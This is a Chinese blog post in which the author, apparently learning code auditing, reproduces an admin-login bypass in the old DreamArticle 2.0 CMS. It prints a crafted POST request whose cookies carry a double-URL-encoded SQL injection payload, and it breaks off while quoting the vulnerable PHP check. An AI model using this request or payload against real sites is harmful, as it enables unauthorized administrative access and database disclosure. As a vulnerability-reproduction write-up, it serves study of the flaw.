DreamArticle2.0后台登录漏洞复现

本文介绍了DreamArticle 2.0 CMS的一个后台登录漏洞,通过分析验证过程,揭示了利用URL解码绕过机制进行非法登录的方法。作者在尝试复现漏洞时,发现可以通过编辑Chrome的cookie来构造请求,并讨论了2.0版本与网上公开的3.0版本的不同之处。同时,文中还提到了在Burp Suite的使用过程中遇到的意外发现,即在特定环境下,即使不设置代理,Burp的网络包也能在PHPStorm中进行debug。
摘要由CSDN通过智能技术生成

一个很老的CMS了。
最近在学代码审计,看到网上有人提到这里的漏洞就想复现出来。先上图
在这里插入图片描述
原文:
利用DreamArticle 后台验证漏洞直接登陆后台:
http://www.webjx.com/security/leak-11941.html

构造以下post请求

POST /da/admin/index.php HTTP/1.1
...
Cookie: PHPSESSID=ci49apcu773lhpug1vd6kv6ub1; iDreamSoft_iCMS_AUTH=9ac6MxBR983xzuQb2oTLXuK%2BYVCAWytYzUACr6%2Fztq2yb6gJquFK8F4tEyXZwDns6YvUbBDaHENODiHjAYUJL0f54QtjvqswkWmwbRrV3CVprtRZgw; XDEBUG_SESSION=PHPSTORM; iDreamSoft_admincode=2126; 

#关键的两个cookie:
iDreamSoft_administrator=dsaf%2527 union select database()#; 
iDreamSoft_adminpassword=dreamarticle;

username=admin&password=adsdadn&codestr=2126&action=l

在chrome中安装EditThisCookie添加cookie(其实我今天手抖,双击了两下开发者工具中的application->storage-cookie下的空行居然可以直接添加cookie,但是后来无法复现了。)
本地修改action的值就可以提交

漏洞原理(2.0版本和网上文章的3.0版本还是有些不一样的):

admin/global.php

$adminid	=intval(get_cookie("adminid"));
$administrator	=get_cookie("administrator");
$adminpassword	=get_cookie("adminpassword");

// 验证是否处于登陆状态
if ($administrator && $adminpassword && get_cookie(
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值